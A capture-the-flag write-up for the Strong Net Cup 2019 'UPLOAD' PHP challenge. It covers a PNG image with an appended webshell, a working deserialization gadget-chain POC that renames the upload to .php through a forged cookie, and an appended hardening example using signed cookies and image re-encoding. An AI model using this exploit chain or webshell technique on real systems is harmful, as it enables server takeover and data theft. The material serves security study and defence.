[Strong Net Cup 2019] UPLOAD

wp

Reference writeup (by a more experienced player): https://www.zhaoj.in/read-5873.html

Personal summary

  1. Normal behaviour: only images can be uploaded; images that are not PNG are automatically converted to PNG, and uploaded images are stored in the upload directory.

  2. This challenge's source code leaks through an exposed www.tar.gz archive; the notes below are based on the disclosed source.

  3. Function process:
    1. When not logged in, the site redirects to index.php for registration or login. The login_check function reads cookie('user'), base64-decodes it, and unserializes the result into $profile.
    2. The registration page calls login_check: if the user is already logged in it redirects to index.php/home, otherwise it shows the registration page.
    3. The login page calls login_check: if the user is already logged in it redirects to index.php/home, otherwise it shows the login page.
    4. Once logged in, the user is redirected to index.php/home, where files can be uploaded.
    5. During the upload, the request's REMOTE_ADDR is md5-hashed and assigned to upload_menu, and a folder named after upload_menu is created.
    6. The login check runs again; the temporary copy of the file is assigned to filename_tmp, and the md5 hash of the file name (without extension) is assigned to filename.
    7. The extension is then checked: the file's extension is assigned to ext, and the check returns 1 if ext is png and 0 otherwise.
    8. If the extension is png, the image is validated, the temporary file filename_tmp is copied to filename, the image's relative path is assigned to img, and update_img is executed.
    9. update_img queries the user; if the user has not uploaded a picture yet and img exists, the img field in the user table is updated and update_cookie is executed.
    10. update_cookie then serializes the uploaded image information (img), base64-encodes it, and stores it in the user cookie.
    11. Profile's two magic methods, __call and __get, define what happens when a non-existent method or a non-existent member variable is accessed. __get looks the name up directly in the except array; __call treats the called name as a member variable and invokes the method whose name is that variable's value.
  4. Attack process:

    1. Register, then log in. After logging in there is a redirect, and at that point a cookie is set, as shown in the figure:

      (Figure: the decoded cookie)

    2. Choose to upload a picture. The picture is a crafted image webshell: download a PNG from the Alibaba vector icon library, generate a shell with AntSword, and append the shell content to the end of the picture in a hex editor. The Alibaba library is used here because PNG images from online hex sources may not be standard-conforming, which causes a parse error after the later rename.

    3. After the picture is uploaded, a directory named md5(REMOTE_ADDR) is created in the upload directory and the file name is md5-hashed; cookie['user'] is then as shown in the figure:

      (Figure: the decoded cookie)

    4. Generate the POC, replace cookie['user'] with the modified serialized object, and refresh to change the extension. During server-side deserialization, the Register class's destructor calls $profile->index(). index() is not defined, so the call goes to Profile's __call; __call reads $this->index, which __get resolves from except to img; the attempt to call img() goes through __call again, and since the img property holds "upload_img", control jumps to the upload_img function. upload_img then executes copy, turning the png into php, and deletes the original png; at this point the extension change is complete.

    5. Finally, connect to the shell directly with AntSword, read the database information from the configuration file, choose the mysqli driver to connect to the database, and read the flag.

  5. The final POC is as follows; only the paths of the uploaded picture need to be modified:

<?php
namespace app\web\controller;

class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __get($name)
    {
        return $this->except[$name];
    }

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

class Register
{
    public $checker;
    public $registed;

    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

}

$profile = new Profile();
// index() does not exist, so __call('index') reads $this->index, which __get resolves via except to 'img'
$profile->except = ['index' => 'img'];
// calling $this->img() goes through __call again; the img property names the real method to run
$profile->img = "upload_img";
$profile->ext = "png";
// just change the paths to match the uploaded picture
$profile->filename_tmp = "../public/upload/24ff17b3e72d90d210f3455327ea52f7/36a767e7b2d8d3bde3f881217a418ebb5.png";
$profile->filename = "../public/upload/24ff17b3e72d90d210f3455327ea52f7/6a767e7b2d8d3bde3f881217a418ebb5.php";

$register = new Register();
$register->registed = false;   // keeps __destruct on the branch that calls $checker->index()
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));
?>

mysqli is a PHP database driver; in the past the mysql extension was used, and mysqli is more secure and efficient than mysql.

copy(a, b): a and b are file paths; the file is copied from a to b. For example, after copy("./1.png", "./1.php") executes, two files exist, 1.png and 1.php.

unlink(a): a is a file path; deletes the file a.
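As an added example that is not part of the original writeup or the challenge's source, the script below shows how the two steps the chain relies on (login_check unserializing cookie('user'), and upload_img copying to whatever $this->filename holds) could be hardened. The function names make_user_cookie, read_user_cookie, legacy_unserialize and safe_copy_upload, the COOKIE_SECRET constant, and the use of the GD extension are assumptions for illustration.

```php
<?php
// Added example (not the challenge's code): hardened replacements for the
// cookie handling and the upload copy. All names here are assumed.
declare(strict_types=1);

const COOKIE_SECRET = 'replace-with-a-random-32-byte-secret'; // assumed server-side key

// 1. Session state leaves the server as HMAC-signed JSON, never as a serialized
//    object, so a tampered cookie cannot instantiate Register/Profile on the way back.
function make_user_cookie(array $state, string $secret = COOKIE_SECRET): string
{
    $payload = base64_encode(json_encode($state, JSON_THROW_ON_ERROR));
    $mac = hash_hmac('sha256', $payload, $secret);
    return $payload . '.' . $mac;
}

function read_user_cookie(string $cookie, string $secret = COOKIE_SECRET): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    // hash_equals avoids leaking the MAC through comparison timing.
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $mac)) {
        return null;
    }
    $decoded = base64_decode($payload, true);
    if ($decoded === false) {
        return null;
    }
    $state = json_decode($decoded, true);
    return is_array($state) ? $state : null;
}

// If legacy code must keep unserialize(), refusing every class breaks the
// __destruct -> __call -> __get chain: objects become __PHP_Incomplete_Class.
function legacy_unserialize(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// 2. The destination is rebuilt from the md5 name with a fixed .png extension,
//    confined to the upload directory, and the bytes must really be a PNG.
function safe_copy_upload(string $tmpPath, string $originalName, string $uploadDir): ?string
{
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if ($ext !== 'png') {
        return null;                         // same policy as the challenge: png only
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[2] !== IMAGETYPE_PNG) {
        return null;
    }
    $realDir = realpath($uploadDir);
    if ($realDir === false) {
        return null;
    }
    $dest = $realDir . DIRECTORY_SEPARATOR . md5($originalName) . '.png';
    // Re-encoding through GD drops anything appended after the image data
    // (the "picture horse" trailer) instead of copying the file byte for byte.
    $img = @imagecreatefrompng($tmpPath);
    if ($img === false) {
        return null;
    }
    $ok = imagepng($img, $dest);
    imagedestroy($img);
    @unlink($tmpPath);
    return $ok ? $dest : null;
}

// Demo with constructed data: a genuine cookie round-trips, a tampered one is rejected,
// and a serialized Register object no longer becomes a live object.
$cookie = make_user_cookie(['user' => 'alice', 'img' => null]);
var_dump(read_user_cookie($cookie) !== null);
var_dump(read_user_cookie(substr($cookie, 0, -1) . 'x') === null);
$serialized = 'O:8:"Register":2:{s:7:"checker";N;s:8:"registed";b:0;}';   // constructed
var_dump(get_class(legacy_unserialize($serialized)));

if (function_exists('imagecreatetruecolor')) {   // GD is assumed to be available
    $dir = sys_get_temp_dir() . '/upload_demo';
    @mkdir($dir);
    $tmp = $dir . '/in.tmp';
    $im = imagecreatetruecolor(1, 1);
    imagepng($im, $tmp);
    imagedestroy($im);
    file_put_contents($tmp, '<?php /* constructed trailer */ ?>', FILE_APPEND);
    $out = safe_copy_upload($tmp, 'cat.png', $dir);
    var_dump($out !== null && strpos((string) file_get_contents($out), '<?php') === false);
}
```

Run it with php on the command line. The first three var_dump calls cover the cookie path; the GD section writes a one-pixel PNG with a trailer appended, pushes it through safe_copy_upload, and confirms the re-encoded output no longer contains the trailer. Signing the cookie addresses the tampering in step 4 of the attack, while rebuilding the destination name and re-encoding the image addresses the png-to-php rename and the appended shell content.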


Source: www.cnblogs.com/peri0d/p/12123818.html